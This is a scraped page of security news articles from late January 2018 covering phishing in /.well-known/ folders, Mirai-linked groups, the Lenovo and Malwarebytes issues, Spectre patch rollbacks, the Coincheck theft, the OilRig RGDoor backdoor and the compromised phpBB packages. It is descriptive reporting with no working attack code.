English Articles -

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40  41  42  43  44  45  46  47  48  49  50 


 


Phishing Pages Hidden in "well-known" Directory
30.1.2018 securityweek 
Phishing
UK-based cybercrime disruption services provider Netcraft has spotted thousands of phishing pages placed by cybercriminals in special directories that are present on millions of websites.

In the past month, the company spotted more than 400 new phishing websites hosted in a folder named /.well-known/. This directory serves as a Uniform Resource Identifier (URI) path prefix that allows users and automated processes to obtain policy and other information about the host.

The /.well-known/ directory is commonly used to demonstrate ownership of a domain. The administrators of HTTPS-protected websites that use Automatic Certificate Management Environment (ACME) to manage SSL certificates place a unique token inside the /.well-known/acme-challenge/ or /.well-known/pki-validation/ folders to show the certificate issuer that they control the domain.

“Consequently, most of the phishing attacks that make use of the /.well-known/ directory have been deployed on sites that support HTTPS, using certificates issued by ACME-driven certificate authorities like Let's Encrypt and cPanel,” Netcraft’s Paul Mutton explained.

Alibaba%20phishing%20page%20hosted%20in%20/.well-known/%20-%20credits%3A%20Netcraft

The /.well-known/ location can be a great place to hide a phishing page due to the fact that while the folder is present on millions of websites – mainly due to the success of ACME and Let’s Encrypt – many administrators are not aware of its presence.

Mutton noted that since there is a dot in front of the directory’s name, listing files using the ls command will not display it as files and folders that start with “.” are hidden. In an effort to make their phishing pages even more difficult to find, cybercriminals have placed them in subdirectories of /acme-challenge/ and /pki-validation/.

“Shared hosting platforms are particularly vulnerable to misuse if the file system permissions on the /.well-known/ directories are overly permissive, allowing one website to place content on another customer's website,” Mutton warned. “Some of the individual servers involved in these attacks were hosting ‘well-known’ phishing sites for multiple hostnames, which lends weight to this hypothesis.”

The expert pointed out that while /acme-challenge/ and /pki-validation/ are not the only well-known URIs, these are the only ones that have been used to host phishing sites.

Netcraft said it was not clear how malicious actors had hijacked the websites found to be hosting these phishing pages.


Researchers Connect Lizard Squad to Mirai Botnet
30.1.2018 securityweek  BotNet
Lizard Squad and Mirai, which are responsible for a series of notorious distributed denial of service (DDoS) attacks, are connected to one another, a recent ZingBox report reveals.

Lizard Squad is a hacking group known for some of the most highly publicized DDoS attacks in history, including the disruption of Sony PlayStation and Xbox Live networks. Over the past several years, multiple individuals suspected to have used Lizard Squad’s LizardStresser DDoS service have been arrested.

While the hacking group has been operating for several years, Mirai has been around for only one year and a half, making headlines in late 2016 following massive DDoS attacks against Brian Krebs’ blog and Dyn’s DNS infrastructure. The malware’s source code was made public within weeks of these attacks and numerous variants have emerged since.

Now, ZingBox researchers claim to have discovered evidence that links the Lizard Squad hackers and Mirai, including the common use of the same Ukraine hosting provider Blazingfast.

The Mirai source code, the researchers point out, was released nine days after Lizard Squad founder Zachary Buchta was arrested. According to them, the DDoS attack on Brian Krebs’ blog in late 2016 appears the result of the journalist’s criticism against Lizard Squad, and there are also references to Mirai on a Lizard Squad website.

Analysis of a domain associated with a Mirai-based malware campaign in late 2017 led the researchers to bigbotPein, a group linked to Lizard Squad. The analyzed domain was registered by an individual associated with Lizard Squad, a ZingBox report (PDF ) claims.

bigbotPein, a group that emerged in support to Buchta following his arrest, adopted Mirai as part of their Internet of Things arsenal and is currently targeting multiple architectures, including x86, x64, ARM, MIPS, SuperH, SPARC and ARC.

What’s more, the group has also added Ethereum and Monero miners to their malware portfolio, while also adopting increased sophistication, the security researchers say.

A Mirai-based campaign observed in October 2017 was pointing to the domain bigbotpein[.]com. The website’s Start of Authority (SOA) points to blazingfast[.]io, the Ukraine hosting provider that is also used by Mirai authors for the botnet control server, ZingBox says.

The security researchers claim they were also able to link the group to multiple Mirai variants out there, including Satori and Masuta. According to them, the Satori campaign was initially called Okiru and was using the control[.]almahosting[.]ru and network[.]bigbotpein[.]com domains.

Starting with mid-January 2018, all the domains related to Lizard Squad and bigbotPein switched to US-base ISPs (Rackspace and Search Guide), which suggests a clear connection between the two groups.

Two other Mirai variants observed last year include Masuta and Memes. The former, detailed only this month, targeted x86, ARM and MIPS architectures. The latter appears to be the work of the same author and might be an evolution of Masuta.

The malware code, ZingBox claims, includes a “structure previously identified in July 2017 related to Lizard Squad.” This code allows the malware to hide and decode second stage payload in memory. Both an Ethereum dropper variant linked to Lizard Squad and Masuta/Memes use this same code structure.

Other evidence linking Lizard Squad and Mirai include the dropping of a file from bigbotPein domain control[.]almahosting[.]ru as part of a Satori campaign in November 2017, leading to the Monero Stratum miner.

A Satori variant observed in early January 2018 was employing an extra level of obfuscation, along with the s[.]sunnyjuly[.]gq domain, and pointing to the use of an Etherum miner for Windows, although the initial attack vector, however, targeted the MIPS architecture.

“During this research, we witnessed firsthand the evolving complexity of the different variants of Lizard Squad and bigbotPein group’s malware within a span of one year […]. The Lizard Squad and bigbotPein groups used to be very active creating most of the well-known variants of Mirai,” ZingBox’ report reads.

“Despite the courageous efforts of our law enforcement agencies to identify and tear down various hacking groups, the collaboration between groups makes it extremely difficult to completely shut down their efforts for good. Arrests of high-profile members and founders of such groups certainly slows down their momentum, but organizations can’t take their foot off the gas when it comes to being vigilant about the security of their network,” Xu Zou, CEO and co-founder, ZingBox, said.


Lenovo Addresses Hardcoded Password in Fingerprint Manager
30.1.2018 securityweek 
Vulnerebility
Computer maker Lenovo has updated Fingerprint Manager Pro for Windows 7, 8, and 8.1 to address several insecure credential storage issues in the software, including the presence of a hardcoded password.

Rated High severity and tracked as CVE-2017-3762, the vulnerability was discovered by Jackson Thuraisamy from Security Compass. An attacker attempting to exploit the issue could escalate their privileges on the local system.

The flaw only impacts Lenovo Fingerprint Manager Pro, a utility for Windows 7, 8, and 8.1 that has been designed to help users log into their PCs or authenticate to configured websites by means of fingerprint recognition.

The bug resides in the use of a weak algorithm when encrypting sensitive data stored by Fingerprint Manager Pro, such as users’ Windows logon credentials and fingerprint data, the company said in an advisory.

What’s more, the application was found to contain a hardcoded password and to be accessible to all users with local non-administrative access to the computer it is installed on.

According to Lenovo, the application may be installed on a large number of device models, including ThinkPad L560, P40 Yoga, P50s, T440, T440p, T440s, T450, T450s, T460, T540p, T550, T560, W540, W541, W550s, X1 Carbon (Type 20A7, 20A8), X1 Carbon (Type 20BS, 20BT), X240, X240s, X250, X260, Yoga 14 (20FY), and Yoga 460; ThinkCentre M73, M73z, M78, M79, M83, M93, M93p, and M93z; and ThinkStation E32, P300, P500, P700, P900.

The vulnerability has been addressed in Lenovo Fingerprint Manager Pro version 8.01.87. Owners of the aforementioned models should update to the new software release.


U.S. Floats Idea Nationalizing High-Speed Networks, Drawing Rebukes
30.1.2018 securityweek  BigBrothers
US officials have launched a debate on a proposal to nationalize the newest generation of high-speed wireless internet networks in the name of national security, provoking sharp criticism from across the political spectrum.

One official familiar with the proposal but not authorized to speak publicly told AFP the idea "has been discussed over the past couple of weeks" at the request of US national security officials.

The proposal was first reported by the news website Axios, citing a memo proposing government control of the newest and fastest part of the nation's mobile network -- the fifth generation, or 5G -- to guard against China's growing online capabilities.

Axios cited a memo by a senior official as contending that the US need to quickly deploy 5G because China is in a top position with the technology and "is the dominant malicious actor" online.

But the proposal -- which would run counter to the longstanding US policy of relying on private telecom networks -- drew immediate rebukes from the industry and even from US regulatory officials.

The official familiar with the proposal noted that "it's not hard to find people who think it's a dumb idea."

Industry leaders pointed out that the private sector is already in the process of building and deploying 5G systems, which will be important for a range of connected devices from appliances to self-driving cars.

The federal government stepping in would "slam the brakes" on momentum to deploy 5G, argued Jonathan Spalter, chief of USTelecom trade association.

"The best way to future-proof the nation's communications networks is to continue to encourage and incentivize America's broadband companies... in partnership with government, to continue do what we do best: invest, innovate, and lead," Spalter said in a statement.

Meredith Attwell Baker, president of the wireless industry group CTIA, added that while 5G is important, "the government should pursue the free market policies that enabled the US wireless industry to win the race to 4G."

Federal Communications Commission chairman Ajit Pai, whose agency regulates the telecom sector, also voiced strong opposition.

"Any federal effort to construct a nationalized 5G network would be a costly and counterproductive distraction from the policies we need to help the United States win the 5G future," Pai, a Republican, said.

Pai's Democratic colleague on the FCC, Mignon Clyburn, agreed, saying a network built by the federal government "does not leverage the best approach needed for our nation to win the 5G race."

Conservative advocacy group FreedomWorks also came out against the idea, arguing that the move would put the US on the same level as China in controlling online access.

FreedomWorks president Adam Brandon said, "We're not beating the Chinese if we sacrifice what makes our government so different from theirs."


Military personnel improperly used Fitness Strava Tracker exposed their bases
30.1.2018 securityaffairs BigBrothers

Military worldwide have publicly shared online their exercise routes recorded through the fitness tracker Strava revealing the fitness sessions conducted inside or near military bases
We discussed many times privacy risks related to IoT devices, here we are to discuss an alarming case, fitness tracker Strava revealed details of Military Bases.

American and allied military worldwide have publicly shared their exercise routes online revealing the fitness sessions conducted inside or near military bases, including Afghanistan, Iraq, and Syria.

This leak of information has happened because military personnel turned on their fitness Strava tracker while making exercises at the bases.

A map showing exercise routes recorded by users of a tracking app reveals sensitive information about military personnel in locations around the world, including Afghanistan, Iraq, and Syria.

Such kind of information could be used by enemies and terrorists to plan an attack.

Obviously while in some regions of the globe it is impossible to distinguish the activity of the military personnel, in other locations the routes immediately stand out.

For example, examining the map of Iraq you can notice that the entire region is dark, except for a series of well-known military bases used by the American military and its allies.

The list of the bases easy to locate thank to the map associated to the fitness tracker Strava includes Taji north of Baghdad, Qayyarah south of Mosul, Speicher near Tikrit and Al-Asad in Anbar Province and a number of minor sites highlighted in northern and western Iraq.

Searching for bases in Afghanistan, it is easy to locate the Bagram Air Field in the north of Kabul along with other smaller sites south of the country.

Strava%20Tracking%20app%20military%20bases

The movements of soldiers within Bagram air base – the largest US military facility in Afghanistan – Source BBC

Similarly, in Syria it is Qamishli in the northwest, a stronghold of US-allied Kurdish forces, is clearly visible.

Tobias Schneider, one of the security experts that discovered the map, shared details about the bases on Twitter, including the French Madama base in Niger.

27 Jan

Tobias Schneider

@tobiaschneider
Replying to @tobiaschneider
Worth browsing a bit. Three positions around the US outpost at Tanf: pic.twitter.com/jS7S4LR2QS


Tobias Schneider

@tobiaschneider
My focus is on Syria, but obviously works all over. French military base Madama in Niger: pic.twitter.com/1e9SRR73xS

7:57 PM - Jan 27, 2018
View image on Twitter
7 7 Replies 174 174 Retweets 331 331 likes
Twitter Ads info and privacy
27 Jan

Tobias Schneider

@tobiaschneider
Replying to @tobiaschneider
A lot of people are going to have to sit thru lectures come Monday morning.


Tobias Schneider

@tobiaschneider
So much cool stuff to be done. Outposts around Mosul (or locals who enjoy running in close circles around their houses): pic.twitter.com/wHItJwYUUI

8:37 PM - Jan 27, 2018
View image on Twitter
10 10 Replies 187 187 Retweets 469 469 likes
Twitter Ads info and privacy
The researchers Nathan Ruser spotted also activities of Russians in Khmeimim.

27 Jan

Nathan Ruser
@Nrg8000
Replying to @Nrg8000
Not just US bases. Here is a Turkish patrol N of Manbij pic.twitter.com/1aiJVHSMZp


Nathan Ruser
@Nrg8000
You can see the Russian operating area in Khmeimim, but also the guard patrol to the NE. pic.twitter.com/iWiX5Kozc1

7:28 PM - Jan 27, 2018
View image on Twitter
3 3 Replies 77 77 Retweets 114 114 likes
Twitter Ads info and privacy
The good news is this issue could be easily fixed, Strava confirmed that “athletes with the Metro/heatmap opt-out privacy setting have all data excluded.”

The app allows users to set up “privacy zones,” that are areas where the Strava tracker doesn’t collect GPS info. These areas can be designed around the user’s home or work, but evidently, the military personnel ignored it.


A new report from MALWAREBYTES reveals a rise of 90% on ransomware detection in business
30.1.2018 securityaffairs
Vulnerebility

A new report from MALWAREBYTES titled “Malwarebytes Annual State of Malware Report” reveals a rise of 90% on ransomware detection in business.
The report brings to light new trends on hackers activities and threats especially the rise of ransomware as a tool of choice.

Researchers from MALWAREBYTES had gathered an enormous amount of data from the telemetry of their products, intel teams, and data science from January to November 2016 and to January to November 2017 to consolidate the evolution of the threat landscape of malware.

It is taken into account the tactics of infection, attack methods, development and distribution techniques used by hackers to target and compromise business and customers alike. There was a surge of 90% in ransomware detection for business customers in such way that it had become the fifth most detected threat. Regarding its modus operandi, the researchers found out a change in the distribution of malicious payloads, which includes banker Trojans and cryptocurrency miners.

Ransomware was on the rise, but it was not the only method employed by hackers. The report reveals that hackers had used banking trojans, spyware and hijackers to steal data, login credentials, contact lists, credit card data and spy on the user as an alternative way to compromise system security. The report discovered that hijackers detection grew 40% and spyware detection grew 30%. The report lists the Top 10 business threat detections with the five most significant threats being: Hijacker, Adware, Riskware Tool, Backdoor, and Ransomware respectively.

While the report covers a variety of threats, it emphasizes how malware outbreak had evolved. A game changer to the ransomware outbreak like WannaCry was the government exploit tool EternalBlue that was leaked and has been employed to compromise update processes and increased geo-targeting attacks. According to the report these tactics had been adopted to bypass traditional methods of detection.

The report highlights the delivery techniques utilized by ransomware due to the EternalBlue exploit tool leaked from NSA. The usage of this exploit tool was a ground break landmark to the development of WannaCry and NotPetya ransomware. The EternalBlue (CVE-2017-0144) is a vulnerability in Server Message Block (SMB) handling present in many Windows operating systems. WannaCry was able to widespread globally due to operating systems that were not properly updated.

The report dedicates a special attention to NotPetya ransomware, as it was influenced by ransomware Petya and WannaCry. This ransomware has used two Server Message Block (SMB) vulnerabilities: EternalBlue (CVE2017-0144) and EternalRomance (CVE-2017-0145) and was also able to encrypt the MFT (Master File Table) and the MBR (Master Boot Record) on affected systems. Other malware analyzed in the report, that used the leaked exploit tools from the NSA was: Adylkuzz, CoinMiner, and Retefe.

The researchers also unveil a new attack vector employed by hackers: Geo Targeting attacks. In this type of attack, groups of hackers or rogue nations employ a variety of techniques to disrupt, destabilize, or compromise data in specific countries. The Magniber malicious code targeted South Korea specifically and the BadRabbit had targeted Ukraine. Although NotPetya emerged in Ukraine its action was not limited within its borders.

Finally, the report brings forth to light trends based on data collected. Cyptocurrency miners already become a new threat with the recent news of a steal of bitcoins from Japan. Other trends to watch out this year in the report is the attacks on the supply chain, the increase of malware in MAC systems and leaks in government and in companies that will lead to new zero-day vulnerabilities


On Saturday Malwarebytes delivered a buggy update that caused excessive memory usage and crashes.
30.1.2018 securityaffairs
Vulnerebility

On Saturday Malwarebytes issued a buggy update to its home and enterprise products that caused serious problems for the users, including excessive memory usage, connectivity issues, and in some cases system crashes.
A buggy update rolled out over the weekend by Malwarebytes to its home and enterprise products caused serious problem for the users, including excessive memory usage, connectivity issues, and in some cases system crashes.

Malwarebytes issued the buggy update on Saturday morning (PST) and according to the security firm the software was only available only for 16 minutes before it removed it.

“On the morning of Saturday, January 27th, 2018 protection update v1.0.3798 was released for all versions of Malwarebytes for Windows. As endpoints updated to this release, customers noticed their machines were reporting many Internet block notifications, and a sudden large increase in RAM usage” reads the Root Cause Analysis published by Malwarebytes.

“There are detection syntax controls in place to prevent such events as the one experienced in this incident. Recently we have been improving our products so that we can show the reason for a block, i.e. the detection “category” for the web protection blocks. In order to support this new feature, we added enhanced detection syntaxes to include the block category in the definitions. The unfortunate oversight was that one of the syntax controls was not implemented in the new detection syntax, which cause the malformed detection to be pushed into production.”

malwarebytes%20buggy%20update

Some users reported problems to their connections that were blocked by the security software after the installation of the buggy update. Another displeasing problems reported by the users is the abnormal memory usage, the process associated with the application had used up more than 10 Gb of the (RAM), in some cases were also observed system crashes.

http%3A//securityaffairs.co/wordpress/wp-content/uploads/2018/01/malwarebytes%20buggy%20update

Malwarebytes confirmed that the broken detection was present in the update version v1.0.3798 thru v1.0.3802. (v2018.01.27.03 – v2018.01.27.11
for MBES customers).

The buggy update was issued to all software versions for Windows, below the list of affected versions:

Malwarebytes for Windows Premium
Malwarebytes for Windows Premium Trial
Malwarebytes Endpoint Security (MBES)
Malwarebytes Endpoint Protection (Cloud Console)
The problem was addressed with the v1.0.3803 (v2018.01.27.12 for MBES customers).

Affected users can follow the recovery solutions published by the company to remove the buggy update and install the correct one.

The company remarked that it pushes tens of thousands updates routinely testing each one before it is distributed.

“We have pushed upwards of 20,000 of these protection updates routinely. We test every single one before it goes out. We pride ourselves on the safety and accuracy of our detection engines and will work to ensure that this does not happen again,” Malwarebytes stated following the incident.


Over the weekend Microsoft rolled out out-of-band updates to disable mitigations for Spectre v2 attacks
30.1.2018 securityaffairs
Vulnerebility

Over the weekend, Microsoft rolled out out-of-band updates to disable mitigations for one of the Spectre attack variants because they can cause systems to become unstable.
The situation is becoming embarrassing! Just after the release of the Meltdown and Spectre security updates Intel excluded any problems for their deployments citing testing activities of conducted by other tech giants.

At the same time, some companies were claiming severe issued, including performance degradation and in some cases crashes.

Last week, Intel changed its position on the security patches, it first published the results of the test conducted on the Meltdown and Spectre patches and confirmed that the impact on performance could be serious, then it recommended to stop deploying the current versions of Spectre/Meltdown patches.

Over the weekend, Microsoft rolled out out-of-band updates to disable mitigations for one of the Spectre attack variants because they can cause systems to become unstable.

“Our own experience is that system instability can in some circumstances cause data loss or corruption.” states the security advisory published by Microsoft.

“While Intel tests, updates and deploys new microcode, we are making available an out of band update today, KB4078130, that specifically disables only the mitigation against CVE-2017-5715 – “Branch target injection vulnerability.” In our testing this update has been found to prevent the behavior described.”

Microsoft was among the first companies that provided security updates for Meltdown and Spectre vulnerabilities, anyway, the patches caused severe issues to AMD architectures.

The decision follows the similar actions adopted by other tech giants like Red Hat, HP, Dell, Lenovo, VMware.

Microsoft and the companies above observed problems after the installation of the Spectre vulnerability (Variant 2, aka CVE-2017-5715, that is a branch target injection vulnerability) for this reason opted to revert previous patches.

While the Meltdown and Variant 1 of the Spectre attacks can be mitigated efficiently with software updates, the Spectre Variant 2 requires microcode updates to be fully addressed.

Intel published a technical note about the mitigation of the Spectre flaw, it addressed the issue with an opt-in flag dubbed IBRS_ALL bit (IBRS states for Indirect Branch Restricted Speculation).

The famous Linus Torvalds expressed in an email to the Linux Kernel mailing list his disappointment, he defined the Linux Spectre Patches “UTTER GARBAGE”

Microsoft confirmed that the patches issued by Intel cause system instability and can in some cases lead to data loss or corruption, for this reason, the company distributed over the weekend the Update KB4078130 for Windows 7, Windows 8.1 and Windows 10 that disables the mitigation for CVE-2017-5715.

The company has also provided detailed instructions for manually enable and disable Spectre Variant 2 mitigations through registry settings.

Microsoft said it is not aware of any attack in the wild that exploited the Spectre variant 2 (CVE 2017-5715 ).

“As of January 25, there are no known reports to indicate that this Spectre variant 2 (CVE 2017-5715 ) has been used to attack customers. We recommend Windows customers, when appropriate, reenable the mitigation against CVE-2017-5715 when Intel reports that this unpredictable system behavior has been resolved for your device,” continues the advisory.


Malwarebytes Delivers Buggy Update to Home, Enterprise Users
29.1.2018 securityweek
Vulnerebility
A protection update pushed out over the weekend by Malwarebytes to its home and enterprise users caused serious problems, including Web connection issues, excessive memory usage, and even system crashes.

The problematic update was released on Saturday morning, Pacific Standard Time (PST), and it was only available for 16 minutes before Malwarebytes took action to stop it from being distributed. However, it was enough for the update to reach a significant number of devices protected by the security firm’s products.

“There are detection syntax controls in place to prevent such events as the one experienced in this incident. Recently we have been improving our products so that we can show the reason for a block, i.e. the detection ‘category’ for the web protection blocks,” Malwarebytes explained. “In order to support this new feature, we added enhanced detection syntaxes to include the block category in the definitions. The unfortunate oversight was that one of the syntax controls was not implemented in the new detection syntax, which caused the malformed detection to be pushed into production.”

Some users reported that their Web connections had been blocked and the process associated with the Malwarebytes application had used up more than 10 Gb of their random access memory (RAM), causing their systems to become very slow and even crash.

The buggy protection update, namely v1.0.3798, was sent out to all versions of Malwarebytes for Windows. The affected applications include Malwarebytes for Windows Premium, including the trial version, Malwarebytes Endpoint Security (MBES), and Malwarebytes Endpoint Protection (Cloud Console). The Mac, Android, and other apps were not impacted.

Malwarebytes has provided detailed instructions for both home and enterprise users on how to recover from this incident and install the correct update on their systems. Users who had their devices turned off when the buggy update was delivered should not be affected.

“We have pushed upwards of 20,000 of these protection updates routinely. We test every single one before it goes out. We pride ourselves on the safety and accuracy of our detection engines and will work to ensure that this does not happen again,” Malwarebytes stated following the incident.

This was not the first time a security solutions provider released an update that caused headaches for home users and system administrators. Other companies involved in similar incidents in recent years include Panda Security, ESET, and Webroot.


Microsoft Disables Spectre Mitigations Due to Instability
29.1.2018 securityweek
Vulnerebility

Out-of-band Windows updates released by Microsoft over the weekend disable mitigations for one of the Spectre attack variants as they can cause systems to become unstable.

Both microcode and software updates designed to address the Spectre and Meltdown vulnerabilities have turned out to be buggy, often making systems unbootable or causing them to reboot more frequently. Intel has temporarily suspended its patches until the issue is resolved and advised customers to stop deploying the updates.

HP, Dell, Lenovo, VMware, Red Hat and others had paused the patches and now Microsoft has done the same.

The problem appears to be related to CVE-2017-5715, which has been described as a “branch target injection vulnerability.” This is one of the flaws that allows Spectre attacks, specifically Spectre Variant 2 attacks.

Microsoft has confirmed that Intel’s patches cause system instability and can in some cases lead to data loss or corruption. Update KB4078130 released by the company over the weekend for Windows 7, Windows 8.1 and Windows 10 – for both clients and servers – disables the mitigation for CVE-2017-5715.

The company has also provided instructions for advanced users on how to manually enable and disable Spectre Variant 2 mitigations through registry settings.

“As of January 25, there are no known reports to indicate that this Spectre variant 2 (CVE 2017-5715 ) has been used to attack customers. We recommend Windows customers, when appropriate, reenable the mitigation against CVE-2017-5715 when Intel reports that this unpredictable system behavior has been resolved for your device,” Microsoft said in its advisory.

Microsoft quickly released mitigations for Meltdown and Spectre after the attack methods were disclosed, but the company’s own updates were also buggy. Shortly after it had started rolling them out, Microsoft was forced to suspend patches for devices with AMD processors due to instability issues.

The Spectre and Meltdown vulnerabilities allow malicious applications to bypass memory isolation mechanisms and access sensitive data. The Meltdown attack relies on one vulnerability, tracked as CVE-2017-5754, but there are two main variants of the Spectre attack, including CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2).

Meltdown and Variant 1 of Spectre can be patched efficiently with software updates, but Spectre Variant 2 requires microcode updates for a complete fix.

Intel, AMD and Apple face class action lawsuits over the Spectre and Meltdown vulnerabilities. However, Intel does not appear too concerned that the incident will affect its bottom line – the company expects 2018 to be a record year in terms of revenue.


Japan-based digital exchange Coincheck to refund to customers after cyberheist
29.1.2018 securityaffairs Incindent

Coincheck announced it will refund about $400 million to 260,000 customers after the hack, the company will use its own funds.
On Friday the news of the hack of the Japan-based digital exchange Coincheck caused the drop in the value of the major cryptocurrencies, the incident had a significant impact on the NEM value that dropped more than 16 percent in 24 hours.

The company suspended the operations of deposits and withdrawals for all the virtual currencies except Bitcoin, the exchange announced it was investigating an “unauthorised access” to the exchange.

According to the company, the hackers stole worth half a billion US dollars of NEM, the 10th biggest cryptocurrency by market capitalization.

The hackers stole 58 billion yen ($530 million), an amount of money that is greater than the value of bitcoins which disappeared from MtGox in 2014.

Coincheck was founded in 2012, it is one of the most important cryptocurrency exchange in Asia.

The company announced it will refund about $400 million to customers after the hack.

Coincheck will use its own funds to reimburse about 46.3 billion yen to its 260,000 customers who were impacted by the cyberheist.

“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.

“We’re still examining how many of our customers are affected,”

Experts believe that the Financial Services Agency will to take disciplinary measures against Coincheck.

It has been estimated that as many as 10,000 businesses in Japan accept bitcoin and bitFlyer, nearly one-third of global Bitcoin transactions in December were denominated in yen.The Cryptocurrencies, and in particular Bitcoin, are very popular in Japan, in April, the Bitcoin was proclaimed by the local authorities as legal tender.

According to Japanese bitcoin monitoring site Jpbitcoin.com, in November, yen-denominated bitcoin trades reached a record 4.51 million bitcoins, or nearly half of the world’s major exchanges of 9.29 million bitcoin.

Japanese media criticized the company blaming the management to have underestimated the importance of security of its investor, they said Coincheck “expanded business by putting safety second”.

Politicians and experts that participated in the World Economic Forum in Davos issued warnings about the dangers of cryptocurrencies, it is expected that government will adopt further measures to avoid abuse and illegal uses of cryptocrurrencies.


Russia Infrastructure Spying Could Cause 'Total Chaos': UK Defence Minister
28.1.2018 securityweek BigBrothers

Britain's Defence Secretary Gavin Williamson has accused Russia of spying on its critical infrastructure as part of possible plans to create "total chaos" in the country that could "cause thousands and thousands of deaths".

In unusually alarmist words from a senior minister Williamson told the Daily Telegraph that, in its research on UK power supply connections with Europe, Moscow appeared intent on sowing "panic" and hurting Britain.

"What they are looking at doing is they are going to be thinking 'how can we just cause so much pain to Britain?'" he said in comments published Thursday night.

"Damage its economy, rip its infrastructure apart, actually cause thousands and thousands and thousands of deaths, but actually have an element of creating total chaos within the country."

Williamson, who only became defence chief in November after predecessor Michael Fallon resigned over allegations of misconduct, gave the interview at the outset of a new five-month defence review.

He is reportedly pressuring finance minister Philip Hammond to allocate more money to defence and scrap further cuts to Britain's strained armed forces.

In the interview the minister said Russia acts in a way "that any other nation would see as completely unacceptable".

Related: Learn More at SecurityWeek's ICS Cyber Security Conference

"Why would they keep photographing and looking at power stations, why are they looking at the interconnectors that bring so much electricity and so much energy into our country," he questioned in the paper.

"They are looking at these things because they are saying these are the ways that we can hurt Britain."

Earlier this week Fallon joined calls from the head of the army for more British military spending, amid warnings the country may struggle to match Russian battlefield capabilities.

Meanwhile the head of the National Cyber Security Centre said the country will likely face a major cyber-attack within two years.

Ciaran Martin told the Guardian it was inevitable a hostile actor would launch an online attack aimed at crippling Britain's critical infrastructure, such as energy supplies, and it was lucky not to have fallen victim to such a strike already.

Williamson, who is tipped as a possible future ruling Conservative party leader, described his scenario planning as "the real threat that I believe the country is facing at the moment."

A spokesman for the Ministry of Defence said it had nothing further to add to his remarks.

The Russian Embassy in London could not be reached for comment Thursday.


Japan's Crypto Exchange to Refund to Customers After Theft
28.1.2018 securityweek Incindent
Japan-based virtual currency exchange Coincheck said Sunday it will refund about $400 million to customers after hackers stole hundreds of millions of dollars' worth of digital assets.

The company said it will use its own funds to reimburse about 46.3 billion yen to all 260,000 customers who lost their holdings of NEM, the 10th biggest cryptocurrency by market capitalization.

On Friday, the company detected an "unauthorised access" of the exchange, and later suspended trading for all cryptocurrencies apart from bitcoin.

The resulting 58 billion yen ($530 million) loss exceeded the value of bitcoins which disappeared from MtGox in 2014.

The major Tokyo-based bitcoin exchange collapsed after admitting that 850,000 coins -- worth around $480 million at the time -- had disappeared from its vaults.

The high-profile demise of MtGox failed to douse the enthusiasm for virtual currencies in Japan, which in April became the first country in the world to proclaim it as legal tender.

Nearly one third of global bitcoin transactions in December were denominated in yen, according to specialist website jpbitcoin.com.

As many as 10,000 businesses in Japan are thought to accept bitcoin and bitFlyer, the country's main bitcoin exchange, saw its user base pass the one-million mark in November.

Many Japanese, especially younger investors, have been seduced by the idea of strong profits as the economy has seen years of ultra-low interest rates offering little in the way of traditional returns.

Major Japanese newspapers on Sunday labelled the management of virtual currencies at Coincheck as "sloppy" and said the company had "expanded business by putting safety second".

Local media added the Financial Services Agency was expected to take disciplinary measures against Coincheck, which proclaims itself "the leading bitcoin and cryptocurrency exchange in Asia", following the theft.


Iran-linked APT OilRig target IIS Web Servers with new RGDoor Backdoor
28.1.2018 securityweek APT

The Iran-linked cyber-espionage group tracked as OilRig started using a backdoor subbed RGDoor to target Internet Information Services (IIS) Web servers.

The OilRig hacker group is an Iran-linked APT that has been around since at least 2015, when targeted mainly organizations in the financial and government sectors, in the United States and Middle Eastern countries.

The hackers used the RGDoor backdoor to target Middle Eastern government organizations and financial and educational institutions.

According to the researchers, RGDoor is a secondary backdoor that allows the hackers to regain access to a compromised Web server when primary TwoFace webshell is discovered and removed.

OilRig hackers are using the TwoFace webshell since at least June 2016, the backdoor

“Unlike TwoFace, the actors did not develop RGDoor in C# to be interacted with at specific URLs hosted by the targeted IIS web server. Instead, the developer created RGDoor using C++, which results in a compiled dynamic link library (DLL).” states the analysis from PaloAlto Networks.

“The DLL has an exported function named “RegisterModule”, which is important as it led us to believe that this DLL was used as a custom native-code HTTP module that the threat actor would load into IIS.”

The attackers exploited the IIS 7 functionality that allows developers to create modules in C++ to extend IIS’ capabilities, in this way they could carry out custom actions on requests

The “native-code modules can be installed either in the IIS Manager GUI or via the command-line using the ‘appcmd’ application,” Palo Alto has explains.

OilRig%20RGDoor

Malware researchers from Paloalto Networks discovered that the code calls the RegisterModule function with arguments that ignore inbound HTTP GET requests, but act on all HTTP POST requests.

When the IIS server receives an inbound HTTP POST request, the backdoor parses the requests searching for the string in HTTP “Cookie” field.

The find was used to issue cmd$ [command to execute], upload$ [path to file], or download$ [path to file] commands.

“RGDoor then constructs its own HTTP response by first setting the “Content-Type” field within the HTTP header to “text/plain”.” continues the analysis.

The choice of the Cookie fields makes it hard to analyze inbound requests related to RGDoor backdoor because IIS does not log the values within these specific fields of inbound HTTP requests by default.

“This backdoor has a rather limited set of commands, however, the three commands provide plenty of functionality for a competent backdoor, as they allow an actor to upload and download files to the sever, as well as run commands via command prompt. The use of RGDoor suggests that this group has contingency plans to regain access to a compromised network in the event their webshells are discovered and remediated.” concluded Palo Alto Networks.

Technical details, including IoCs are reported in the analysis published by PaloAlto Networks.


Download URLs for two packages of the phpBB forum software were compromised
28.1.2018 securityaffairs
Vulnerebility

Hacker compromised the download URLs of the popular phpBB forum software, for around three hours they were delivering infected versions of legitimate files.
The popular phpBB free and open source forum software has been compromised by an unknown hacker. According to a security advisory released by the phpBB maintainers, the attacker has compromised download URLs for two phpBB packages.


phpBB
@phpbb
[Security] phpBB 3.2.2 Packages Compromised http://dlvr.it/QCxM6v

4:15 AM - Jan 27, 2018
1 1 Reply 8 8 Retweets 3 3 likes
Twitter Ads info and privacy
The downloads URLs compromised were related to the phpBB 3.2.2 full package and the phpBB 3.2.1 -> 3.2.2 automatic updater.

“Earlier today, we identified that the download URLs for two phpBB packages available on phpBB.com were redirecting to a server that did not belong to us. We immediately took down the links and launched an investigation.” reads the announcement published by the development team.

“The point of entry was a third-party site. Neither phpBB.com nor the phpBB software were exploited in this attack.
If you downloaded either the 3.2.2 full package or the 3.2.1 -> 3.2.2 automatic updater package between the hours of 12:02 PM UTC and 15:03 PM UTC on January 26th, you received an archive modified with a malicious payload. “

